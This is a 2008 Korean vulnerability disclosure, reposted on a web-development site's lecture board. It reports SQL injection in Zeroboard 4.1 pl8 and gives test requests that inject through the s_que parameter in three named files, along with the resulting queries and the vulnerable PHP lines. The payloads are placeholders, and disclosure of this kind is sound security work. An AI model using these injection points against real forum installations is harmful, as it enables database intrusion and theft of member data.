[4.1 pl8]제로보드 SQL 인젝션 취약점 발생 > 온라인강의

본문 바로가기
 
 
 
오늘 1,595
어제 1,674
최대 2,526
전체 3,401,162

최근 방문자

1706
1573
932
869
1674
1595
22 23 24 25 26 27
비즈니스의 시작 비즈명함 ~ 가격, 품질, 배송 3가지 만족을 드리는 비즈명함 / 즉석명함 / 급행서비스 / 서울 전지역 수도권일부 3시간배송

select * from g5_menu where me_use = '1' and me_link like '%lecture%'
온라인강좌 홈 > 온라인강좌 > 온라인강좌

제로보드 | [4.1 pl8]제로보드 SQL 인젝션 취약점 발생

페이지 정보

작성일2008-04-15 09:48 조회21,348회 댓글0건

본문

                                                                                 - 발견자     : XX유치원 선생 황..
                                                                                 도움주신분 : 우리반 7세 친구들 ^^,  회충(Silverbug)

총 3개의 파일 SQL 인젝션 취약한 파일 발견..
그외 관리자 권한이 필요한 소스에서도 다수 발견...(리포팅 안함)

아이들과 해킹 놀이를 하다가 발견!


1. 취약한 파일 :: zboard.php

[TEST Code]
 http://AttackServer/bbs/zboard.php?id=test&s_que=SQL_INJECTION

[Result]
 select * from zetyx_board_test where SQL_INJECTION order by headnum asc limit 0, 20


[File line number]
 17         if($s_que) {
 18                 $_dbTimeStart = getmicrotime();
 19                 $que="select * from $t_board"."_$id $s_que order by $select_arrange $desc limit $start_num, $page_num";
 20                 $result=mysql_query($que,$connect) or Error(mysql_error());
 21             


2. 취약한 파일 ::  member_memo3.php

[TEST Code]
 http://AttackServer/bbs/member_memo3.php?s_que=SQL_INJECTION

[Result]
 select count(*) from zetyx_member_table SQL_INJECTION

[File line number]
 19         if($keyword) {
 20                 if(!$status) $s_que=" where user_id like '%$keyword%' or name like '%$keyword%' ";
 21         }

 23 //전체 회원의 수
 24         $temp2=mysql_fetch_array(mysql_query("select count(*) from $member_table  $s_que"));

 // 오프라인 멤버
 52         if(!$status) {
 53                 $que="select * from $member_table $s_que order by no desc limit $start_num,$page_num";
 54                 $result=mysql_query($que) or Error(mysql_error());

 


3.  취약한 파일 ::  _head.php

[TEST Code]
 POST /bbs/zboard.php HTTP/1.1
 Host: AttackServer
 Cookie: PHPSESSID=00447af854280a8516774c9ffce366cf
 Content-Length: 128

 page=1&id=test&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=on&category=&keyword=Search&x=17&y=11&s_que=SQL INJECTION

[Result]
 select count(*) from zetyx_board_test  where division='1' and  SQL INJECTION and (  subject like '%asdfsadf%'  or memo like '%asdfsadf%'  ) 

[File line number]
 172     $temp=mysql_fetch_array(mysql_query("select count(*) from $t_board"."_$id $s_que ",$connect));
[출처] [4.1 pl8]제로보드 SQL 인젝션 취약점 발견.|작성자 사군

 

  • 페이스북으로 보내기
  • 트위터로 보내기
  • 구글플러스로 보내기

댓글목록

등록된 댓글이 없습니다.


목록

Total 2,007건 1 페이지
온라인강의 목록
번호 제목
2007
2006
2005
2004
2003
2002
2001
2000
1999
1998
1997
1996
1995
1994
1993
1992
1991
1990
1989
1988
1987
1986
1985
1984
1983
게시물 검색
 
 
상호: 해피정닷컴 대표:정창용 사업자등록번호:119-05-36414 (08394) 서울시 구로구 디지털로 242 한화비즈메트로1차 1502호
전화: 070-7600-3500 팩스:02-865-3528 개인정보관리:정창용 mail@happyjung.com 에스크로확인
개인정보취급방침
COPYRIGHT 2001~2017 해피정닷컴. All rights reserved. 부가통신사업신고:서울체신청-1217 통신판매신고:2014-서울구로-0074
 
모바일 버전으로 보기